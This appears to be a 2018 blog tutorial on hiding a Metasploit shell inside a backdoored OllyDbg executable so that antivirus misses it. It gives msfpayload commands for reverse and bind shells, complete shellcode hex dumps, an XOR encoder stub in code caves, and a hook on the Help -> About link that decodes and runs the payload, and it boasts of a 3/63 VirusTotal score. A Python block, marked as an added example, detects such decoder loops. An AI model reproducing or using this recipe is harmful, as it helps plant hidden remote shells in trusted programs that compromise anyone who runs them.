Sunday, July 1, 2018

Tricking AV Scanners

Introduction

This is a continuation of the Backdooring PE Files article. We take off from the same binary that was backdoored there. The idea now is to hide the malicious payload from AV detection: we create a 2nd code cave to host an XOR stub, use it to encode the 1st code cave that contains the msfpayload, then realign the stack and return the execution flow to its original position.

The trick here is not to execute the XOR stub immediately when OllyDbg is run. Instead, we hook a function inside it: when the user clicks the Help -> About -> hyperlink button, the XOR stub decodes the msfpayload. This provides better AV bypass than executing the XOR stub immediately. I scored 3/63 in VirusTotal! Meaning only 3 AVs detected my method :-)


Pre-requisite

1. Use cave_miner to identify slack space (a code cave) in the binary; we will use the second entry in the cave_miner output below:

# cave_miner search --size 700 OLLYDBG-04.exe

    /========\
   /    ||    \
        ||
        ||
        ||
   CAVE || MINER

[*] Starting cave mining process...
    Searching for bytes: 0x00...

[*] New cave detected !
  section_name: .data
  cave_begin:   0x000c9d4b
  cave_end:     0x000ca1b4
  cave_size:    0x00000469
  vaddress:     0x004caf4b
  infos:        Readable, Writeable, Contain initialized data

[*] New cave detected !
  section_name: .data
  cave_begin:   0x000caa39
  cave_end:     0x000cab3a
  cave_size:    0x00000101
  vaddress:     0x004cbc39
  infos:        Readable, Writeable, Contain initialized data


[*] Mining finished.

2. Note the original location of the 1st code cave in the earlier backdoored OllyDbg.exe. This is the location of the raw msfpayload:

Start: 00553000
End: 00553139

3. We will use BT5 to generate a reverse_shell payload with LHOST=192.168.0.162 and LPORT=1978:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.162 LPORT=1978 R > shell; hexdump -C shell | grep -v 0000013a |cut -d" " -f3-19|tr -d "(\n|'')"
fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 68 c0 a8 00 a2  68 02 00 07 ba 89 e6 6a10 56 57 68 99 a5 74 61  ff d5 68 63 6d 64 00 89e3 57 57 57 31 f6 6a 12  59 56 e2 fd 66 c7 44 243c 01 01 8d 44 24 10 c6  00 44 54 50 56 56 56 4656 4e 56 56 53 56 68 79  cc 3f 86 ff d5 89 e0 4e56 46 ff 30 68 08 87 1d  60 ff d5 bb f0 b5 a2 5668 a6 95 bd 9d ff d5 3c  06 7c 0a 80 fb e0 75 05bb 47 13 72 6f 6a 00 53  ff d5

3a. Alternatively, you can use BT5 to generate a bind_shell:

 msfpayload windows/shell_bind_tcp LPORT=1978 R > shell; hexdump -C shell | grep -v 00000155 |cut -d" " -f3-19|tr -d "(\n|'')"
fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 31 db 53 68 02  00 07 ba 89 e6 6a 10 5657 68 c2 db 37 67 ff d5  53 57 68 b7 e9 38 ff ffd5 53 53 57 68 74 ec 3b  e1 ff d5 57 89 c7 68 756e 4d 61 ff d5 68 63 6d  64 00 89 e3 57 57 57 31f6 6a 12 59 56 e2 fd 66  c7 44 24 3c 01 01 8d 4424 10 c6 00 44 54 50 56  56 56 46 56 4e 56 56 5356 68 79 cc 3f 86 ff d5  89 e0 4e 56 46 ff 30 6808 87 1d 60 ff d5 bb f0  b5 a2 56 68 a6 95 bd 9dff d5 3c 06 7c 0a 80 fb  e0 75

4. This is the XOR stub. Running it once encodes the payload; running it again decodes it. Pay attention to the three constants: the start of the 1st code cave, the XOR key 0F, and the end address of the region to encode.

MOV EAX, 00553000            # Start of the region to encode (1st code cave) in EAX
XOR BYTE PTR DS:[EAX],0F     # XOR the byte at [EAX] with the key 0F
INC EAX                      # Advance to the next byte
CMP EAX, 00553139            # Have we reached the end of the region?
JLE SHORT 004CAF54           # If not, jump back to the XOR instruction

The target of the jump back (004CAF54) is the address of the XOR instruction itself: XOR BYTE PTR DS:[EAX],0F. Because the loop runs while EAX is less than or equal to the end address, the byte at 00553139 is included in the encoded region.
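As an added example (not part of the original post, nor of the cave_miner or Metasploit tooling), the following Python reproduces the stub's loop on an in-memory copy and shows the two things a scanner can look for in a binary modified this way: the opcode pattern of the decoder loop itself (MOV EAX,imm32 / XOR BYTE PTR [EAX],imm8 / INC EAX / CMP EAX,imm32 / JLE SHORT), and the known stager prologue recovered by trying all 256 single-byte keys. The prologue bytes and the constants 00553000, 00553139 and 0F come from this page; the layout of the sample image, its padding, and the bytes following the prologue are constructed test data.

```python
import re
from typing import Optional

# Known plaintext: the first 15 bytes of the windows/shell_reverse_tcp and
# windows/shell_bind_tcp payloads dumped on this page (both start identically).
STAGER_PROLOGUE = bytes.fromhex("fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30")

# Opcode pattern of the five-instruction stub with its immediates wildcarded:
#   B8 imm32      MOV EAX, imm32
#   80 30 imm8    XOR BYTE PTR [EAX], imm8
#   40            INC EAX
#   3D imm32      CMP EAX, imm32
#   7E rel8       JLE SHORT rel8
STUB_PATTERN = re.compile(rb"\xb8(.{4})\x80\x30(.)\x40\x3d(.{4})\x7e(.)", re.DOTALL)


def xor_region(buf: bytes, start: int, end: int, key: int) -> bytes:
    """Replicate the stub's loop on a copy of buf: XOR every byte from offset
    `start` to `end` inclusive. Applying it twice restores the original."""
    out = bytearray(buf)
    for i in range(start, end + 1):
        out[i] ^= key
    return bytes(out)


def find_xor_stubs(buf: bytes) -> list:
    """Return (offset, start_va, end_va, key) for each decoder loop found."""
    hits = []
    for m in STUB_PATTERN.finditer(buf):
        start_va = int.from_bytes(m.group(1), "little")
        end_va = int.from_bytes(m.group(3), "little")
        key = m.group(2)[0]
        # A genuine loop walks forwards and its JLE jumps backwards (rel8 < 0).
        if start_va <= end_va and m.group(4)[0] >= 0x80:
            hits.append((m.start(), start_va, end_va, key))
    return hits


def find_xored_prologue(buf: bytes) -> Optional[tuple]:
    """Brute-force all single-byte keys and look for the known stager prologue.
    Returns (offset, key); key 0 means the payload is stored in the clear."""
    for key in range(256):
        needle = bytes(b ^ key for b in STAGER_PROLOGUE)
        off = buf.find(needle)
        if off != -1:
            return (off, key)
    return None


def build_sample() -> bytes:
    """Constructed test image: the stub from the page (key 0F, region
    00553000-00553139), 32 bytes of padding, then the XOR-encoded payload."""
    stub = (b"\xb8" + (0x00553000).to_bytes(4, "little")   # MOV EAX,00553000
            + b"\x80\x30\x0f"                                 # XOR BYTE PTR [EAX],0F
            + b"\x40"                                         # INC EAX
            + b"\x3d" + (0x00553139).to_bytes(4, "little")   # CMP EAX,00553139
            + b"\x7e\xf5")                                    # JLE SHORT -11 (back to the XOR)
    payload = STAGER_PROLOGUE + bytes(range(0x40, 0x60))      # constructed filler after the prologue
    image = stub + b"\x00" * 32 + payload
    region_start = len(stub) + 32
    return xor_region(image, region_start, region_start + len(payload) - 1, 0x0F)


if __name__ == "__main__":
    sample = build_sample()
    for off, start_va, end_va, key in find_xor_stubs(sample):
        print(f"decoder loop at offset {off}: {start_va:08X}-{end_va:08X}, key {key:02X}")
    hit = find_xored_prologue(sample)
    if hit:
        print(f"stager prologue at offset {hit[0]} under single-byte key {hit[1]:02X}")
```

Both checks are cheap enough to run over a whole section, and together they explain the low detection count reported below: a scanner that only matches the raw msfpayload bytes misses the encoded copy, while one that either recognises the decoder loop or tries the 256 keys against a short known prefix finds it immediately.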

Putting The Pieces Together

5. To trick the AV scanners, we should not trigger the decoder stub immediately but only when the user clicks on a function in OllyDbg.exe such as Help -> About -> hyperlink. To find that handler, search OllyDbg.exe for referenced text strings: in Immunity, right-click -> Search for -> All referenced text strings:


5a. Search for a text reference matching the function that you wish to hijack.


6. Next, we need to restore the entry point of OllyDbg to its natural flow, since the earlier article modified it to jump directly to the 1st code cave. Below is the original entry point, which is what it is supposed to be.



7. The entry point to hijack is the 'About' function, which is located here:

00440CE2  |. 68 7F914B00    PUSH OLLYDBG-.004B917F 
00440CE7  |. 68 7A914B00    PUSH OLLYDBG-.004B917A                   
00440CEC  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]            
00440CEF  |. 50             PUSH EAX                                 ; |hWnd
00440CF0  |. E8 4DE60600    CALL <JMP.&SHELL32.ShellExecuteA>     



8. Now overwrite the first instruction at this address with a jump to the 2nd code cave address (the XOR stub location identified by cave_miner), e.g.:
JMP 004CBC39

9. Go to the 2nd code cave (press Ctrl-G and enter 004CBC39) and type in the XOR stub.



10. At the end of the XOR stub, retype the entry point code from step 7 (the instructions up to the CALL), e.g.:
PUSH 004B917F                  
PUSH 004B917A
MOV EAX,DWORD PTR SS:[EBP+8]
PUSH EAX

10a. Lastly, jump to the 1st code cave (00553000) where our evil payload is located. The first time this path runs, the XOR stub encodes the msfpayload; once the encoded bytes are saved, the same stub decodes it again at run time, e.g.:
JMP 00553000



11. Save changes to Ollydbg-05.exe.

12. Reopen it in Immunity.

13. This time, place a breakpoint just before the XOR stub and step into the XOR loop (press F7) until it finishes encoding. If you follow EAX in the Dump window, you can watch the payload being encoded byte by byte in the lower-left panel.



13a. Copy the encoded contents: highlight the encoded payload bytes, choose Copy Executable -> Selection, and save the result as a new OllyDbg.exe file.

14. Now execute OllyDbg.exe without Immunity and it should decode itself. OllyDbg should open normally; when you click Help -> About -> hyperlink, a bind shell should appear on port 1978 on localhost.




15. Done. Try scanning it against VirusTotal to see your score! I got 3/63, which is pretty impressive :-)


